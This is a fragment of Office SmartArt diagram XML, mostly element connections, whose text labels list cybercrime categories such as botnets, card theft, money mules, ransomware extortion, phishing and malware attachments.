    <dgm:cxn modelId="{471992AE-CE60-4029-B212-FBD385815630}" type="presParOf" srcId="{3269FA4C-D252-4BF3-8FD7-3EF0B0EB4DC5}" destId="{D25DF860-47FD-42F0-B603-5671C9C185E2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB285F94-71EA-4369-BDBE-436B8BF7B437}" type="presParOf" srcId="{3269FA4C-D252-4BF3-8FD7-3EF0B0EB4DC5}" destId="{2DC6BE09-6C35-45D2-A751-D4BF107EE4F9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{90F78E9E-B0EA-431D-BEE4-D3D28F62E420}" type="presParOf" srcId="{9D2C08D0-E0F0-40F1-945E-8118EE39E546}" destId="{3476964E-2C32-4025-9130-A9EBDC581214}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0583537B-E334-4C98-BD97-A42956CD101A}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{0DB06ADF-5D22-4867-A9A8-3ACC6EA49E1E}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{275578A9-19CC-465B-9812-867FFDAB9B66}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{A1D52E2D-12F9-44FE-BAA9-BF77EBFF9477}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{831EEDB7-B1FE-482F-B5F4-C99481D8018D}" type="presParOf" srcId="{A1D52E2D-12F9-44FE-BAA9-BF77EBFF9477}" destId="{C44B8C40-DDE4-4680-B610-2F752476D7CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{110162B7-3715-4B4B-A781-74A9927C3BED}" type="presParOf" srcId="{C44B8C40-DDE4-4680-B610-2F752476D7CD}" destId="{C2EBA7DD-B67B-4866-B7D0-1EDF7294D4EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DD613A97-4327-4B64-A7FC-AA5BE4307230}" type="presParOf" srcId="{C44B8C40-DDE4-4680-B610-2F752476D7CD}" destId="{2987343F-C488-4AC1-A4FD-C02C38DCC47B}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AE0F1ECD-32AA-4BC0-A5D3-6B9541005EF9}" type="presParOf" srcId="{A1D52E2D-12F9-44FE-BAA9-BF77EBFF9477}" destId="{DFB7B5A5-9481-448F-9F82-73AB43F777C1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9FEC087B-6D91-4635-BD8E-297105DA8CEC}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{2E8E46D9-FBC5-4AA6-9A5D-86A5A084592D}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B3AE1531-8E15-4BE9-94B9-1CC06699C937}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{ED8460A9-D5F2-4DB8-9253-A88A15090506}" type="presParOf" srcId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" destId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B84FD058-13FC-4E36-B1CC-EB1B422DFEAB}" type="presParOf" srcId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" destId="{C0FEB4AB-1570-4BE8-AFF6-5BCF38B454B9}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{FE6380F8-BBC0-4FF0-84C6-3AE5DFB9A885}" type="presParOf" srcId="{41513FDA-8D68-4BF5-A2C7-C8764C08B484}" destId="{A5B2796D-E837-4404-9852-61F32C250BFA}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB897544-2E25-42DF-BE50-F555D972762D}" type="presParOf" srcId="{17361D21-EF50-4EB2-B410-A279C1ACC086}" destId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB5FB326-C7F3-4C7A-91B4-72706DE60842}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{73DC0BED-9251-4B5C-8191-EE587DFF262E}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{6F6255F1-F40C-4185-BC76-BB573C6D6D68}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{29C1F1F2-865C-4369-B5AA-00425125198E}" type="presParOf" srcId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" destId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{94284893-A642-4B31-9860-93FA57778DCA}" type="presParOf" srcId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" destId="{47F209D6-A50F-4593-8101-495466DA161C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B32B2F53-F315-416E-8665-4FB3FF1858B0}" type="presParOf" srcId="{63907A6F-E632-45E0-BF5C-1787833BE2FE}" destId="{98617AD6-2A5A-4CC4-817B-C33D1FB1B247}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E4E50648-66B0-4B93-9C04-4D70D4C390D4}" type="presParOf" srcId="{85CE7EBA-A70E-4C09-B045-A49F4EE7818F}" destId="{44FEA90B-B9F0-4838-A33A-C2D7921EB239}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C6E79500-C5CB-4E73-BA17-B6D9BCE88DE2}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{493BF7B8-A5EF-4E70-BC84-2CB6E0FDEE0A}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DD6FF320-BA5D-4D63-BE54-468A9BE1ABC8}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{30E2F406-52B6-4843-8762-19EE82C6795D}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{7D5B285A-DD70-4CB2-83CA-363AC56158E5}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{846994CE-CB32-4B54-9243-F462A1BAB8D6}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{41F46E1C-1ABF-4C23-8BC5-73CEEFAF6B00}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{11BDAE4A-BDED-4A8E-B175-FF65C957881B}" type="presParOf" srcId="{B81EEFDE-3C40-428C-BE91-8430BFBCEA16}" destId="{89825871-887C-4144-92E4-0CD1C779523E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{BE544174-B4AF-4ACC-B8C4-4A81C82B51D3}" type="presParOf" srcId="{30E2F406-52B6-4843-8762-19EE82C6795D}" destId="{A382E3D8-F167-402C-95ED-E85E712B3958}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AB97D865-4F7E-43FB-A2BD-0B3C980F8B8D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{AC97DC07-675E-4CF3-9913-C7CB3E6FE0DB}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A1E0EB1C-BCB0-40B7-85BC-0ACFABA3374D}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9F17A1D6-89D0-479D-9E04-BB7ABFD5CE57}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67966BE4-FE5C-4570-9440-292AFFDB4ECC}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5B4386DD-F917-43FB-BD7A-792114CE85BD}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{769CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D68CB307-387B-4B02-BB59-4F8D93E9BECE}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{F80F370F-4960-4A7F-8CDD-3F645777D926}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C7262EEE-09B2-4C39-B93D-0C6697BFCA6B}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1164DF9C-47B4-4930-BF8C-FB83C56F57E8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9ABDAE99-4AA9-4F09-8D3E-8A19AF57C419}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A778D506-92B5-4FC9-8988-820EDFBF4190}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67965192-6709-4753-B296-83A5E275D540}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{49871D27-F564-45D4-9535-E5D3429C61C3}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{1DE75C67-9F60-4DCF-8A09-6EBB5AA047F8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{72988983-F36C-49B8-9178-884F57BA9842}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{3E089C12-00A1-4C52-ACA6-DA689DC530B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D3D7B3E0-2DE8-4C73-8092-27B984FFF627}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{DCB922D2-A971-46B6-8A66-A63871EC5D71}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{913BBCA6-6A15-4081-ACFB-D98F477B7550}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1BE63070-B619-415B-AE72-C4895210C2ED}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{88885C49-E13F-46DB-BD55-02549CE6B683}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{39DE0E1E-A457-4031-A6D1-C04DDA15C6D9}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{26F2BD33-885F-4A44-82C7-4A65EBFA30E6}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{D7493045-F4D0-49BB-8749-0235A8D3915E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F54E657B-FEC8-4658-B618-9477ABD53598}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{E562E629-8E7C-4C02-A214-F4E36EE87E99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AE993755-C27B-4D66-B7FA-337056FF690B}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{B2CAA67D-ED33-4120-9634-DF98516FB005}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4BC450DA-C7E2-4383-A9BD-D326CF26687E}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B0B4EB34-DD2F-4309-B751-E58D5D591CAF}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9532000B-227B-4799-A1D1-6E51BB4EC17B}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{A20E9766-61CD-4711-B99D-41622BFCA782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D0537B6E-16F4-4A9A-A7DF-AE2F524FE785}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{E1CF22F3-AC19-46C9-A82F-89D8DB189CE8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E619EEAD-D932-4228-A171-FDFC2A3FA229}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{4A7C2F52-ACA9-4730-89EA-B234D19B30FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AC723CA2-7799-4818-B6E1-D9570D14FB31}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{CE2BD6A2-C6A6-4AE7-8716-F62AC787B4F6}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{137C7443-E818-4254-BC58-ED1832584EF8}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{124F88C5-C1D5-4402-8050-69A3610B0063}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0B5E36FB-CF72-4F52-8173-8D0CCEDA9AF4}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DC7E7830-0E48-4050-9CC0-FF34AA022703}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{2CA4696A-F32D-4557-9668-86E3DEF687D3}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{F83FE0F9-C0AD-41ED-8499-585D4FDF8177}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E8990450-3DB7-4904-A625-F1E80A3C4A27}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{E3521F4E-CD84-466B-AF37-02AB70C55B9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20B35F-2635-4F8F-9051-2B1A318D39FF}"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B632587F-1A59-4B58-8F39-3F88332608F5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Botnets</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E780597-A9D7-4E6A-B969-7F37A974753C}" type="parTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAFC8618-BD8D-4D8C-BB34-17C52689EDA4}" type="sibTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F06AC04-9C84-4A47-BFDD-AE87232D1106}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E7D7A7B-2ADD-469E-B0F8-D565F03F46F9}" type="parTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33C404C4-6211-4C8B-9140-D0533EAFE621}" type="sibTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F920927-1A73-470C-97F0-75ABFA67423F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B2D1F3B-F359-4548-91E0-0C2AC7CCD7A1}" type="parTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79406963-93E8-4610-9E27-FEFF794E3AB0}" type="sibTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426355DA-85B0-49DB-B723-939237685E7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05039FCC-4F08-4EEE-ACAE-BAC85EFDD1D7}" type="parTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7DCF50B-90BE-4C41-AAFB-5990C2737070}" type="sibTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03A48CFA-6496-41BF-A746-80A181C3C3DE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Spam</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72633D96-4A27-4E50-A39C-37AB41EEA9FE}" type="parTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E5E1350-FE66-4F91-840A-B3A1E5069B7E}" type="sibTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45F34A96-294F-4F91-858C-0CCFEC2CFF6B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3BBBB2C-8F74-4541-A78F-D9AB9652D44B}" type="parTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AD622BB-3D20-4961-90A9-7E3A3EAB1155}" type="sibTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C92294B8-F12A-42FD-B72C-42C2FDCD2D8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80A49C2A-5C20-42BB-A1DC-6558C20289C2}" type="parTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{611D77A5-92DE-47E3-878A-892C64739260}" type="sibTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CB81644-432E-42AF-ABA9-71ABDDE58956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95C1DC5D-E737-4A41-83F0-AD800A95D9F5}" type="parTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87368739-70E0-48CC-B078-DBA02B966C38}" type="sibTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{934DA221-5443-497E-A4E4-A348E6ACDDB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37AAF2A0-4D79-4496-8E06-D2AF95C6A459}" type="parTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4D10C71-FE60-4F42-8EF6-606461EE738A}" type="sibTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
